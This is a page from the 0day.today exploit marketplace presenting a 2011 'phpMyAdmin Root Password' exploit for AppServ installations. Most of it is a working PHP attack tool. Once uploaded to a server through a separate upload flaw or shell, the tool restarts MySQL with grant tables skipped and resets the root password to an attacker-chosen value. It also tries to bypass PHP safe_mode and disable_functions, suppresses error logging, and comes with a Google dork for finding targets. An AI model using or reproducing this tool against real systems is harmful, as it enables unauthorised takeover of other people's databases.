0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpMyAdmin Root Password 0day
.-"""-. / .===. \ \/ 6 6 \/ ( \___/ ) ______________ooo__\_____/__________________ / \ | __ __ ___ | | /| _) _) /_| _ _ _ _ | | | __) __) /(_|(_|\/. (_(_)||| | | / | | $3ll: G5 (W.DLL) version 1.5 | | author: Piaster (wadelamin) | | E-mail: w.dll@live.com | | copyright: 2010-2011 | | Page:http://www.facebook.com/Pias.Piaster | \___________________________ooo______________/ | | | |_ | _| | | | |__|__| /-'P'-\ (__/ \__) # Exploit Title: [phpMyAdmin Root Password] # Date: [21/6/2011] # Home: 1337day.com # Author: [Piaster (wadelamin)] # phpmyadmin: Software Link: [www.appservnetwork.com ||www.phpmyadmin.net] # Version: [all phpmyadmin Version] # Category:: [remote, local] # Google dork: [inurl:phpMyAdmin || The AppServ Open Project - [all Version] for Windows ] # Tested on: [Windows & unix] # E-mail: w.dll@live.com # Page: http://www.facebook.com/Pias.Piaster File Bug: //-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------// echo "Welcome to AppServ MySQL Root Password Reset Program\n\n"; AppServCMD(); function AppServCMD() { define('STDIN',fopen("php://stdin","r")); echo " Enter New Password : "; $input = trim(fgets(STDIN,256)); $input = ereg_replace('\"', "\\\"", $input); $input = ereg_replace('\'', "\'", $input); echo "\n Please wait ...................................\n\n"; exec ("net stop mysql"); exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root'); //You can add a password and then request the file via the browser exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\""); exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown"); sleep(3); exec ("net start mysql"); } //--------------------------------END-----------------------------------// I've modified the file and then request the file from abroad But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script And then request the file via the browser There Important Note: If the Windows server can access phpMyAdmin immediately if the file to complete the process this means that it is restarted the Mysql and then change the password. //---------------------------------Exploit the vulnerability tool------------------------// <? echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>'; @set_time_limit(0); @ini_restore("safe_mode"); @ini_restore("allow_url_fopen"); @ini_restore("open_basedir"); @ini_restore("disable_functions"); @ini_restore("safe_mode_exec_dir"); @ini_restore("safe_mode_include_dir"); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; if(function_exists('exec')){$pias = exec;} elseif(function_exists('shell_exec')){$pias = shell_exec;} elseif(function_exists('system')) {$pias = system ;} elseif(function_exists('passthru')) { $pias = passthru ;} if($win) { define('STDIN',fopen("php://stdin","r")); $input = trim(fgets(STDIN,256)); $input = ereg_replace('\"', "\\\"", $input); $input = ereg_replace('\'', "\'", $input); echo "\n Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster"; $pias("net stop mysql"); $pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root'); $pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\""); $pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown"); sleep(3); $pias("net start mysql");} if(!$win) { echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>'; if(isset($_REQUEST['pias'])){ $dbu = $_REQUEST['dbu']; $dbp = $_REQUEST['dbp']; $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost'; $conn = @mysql_connect($dbh, $dbu, $dbp); $select = @mysql_select_db('mysql', $conn); if (!$select) { echo @mysql_error();} $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';"; $go1 = @mysql_query( $t1 , $conn); if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';} else echo 'database mysql not acsses or not found ty agin';}} echo '<br><br>By Piaster :: w.dll@live.com :: '. $f ; ?> //---------------------------------Exploit the vulnerability tool end--------------------// # 0day.today [2024-12-24] #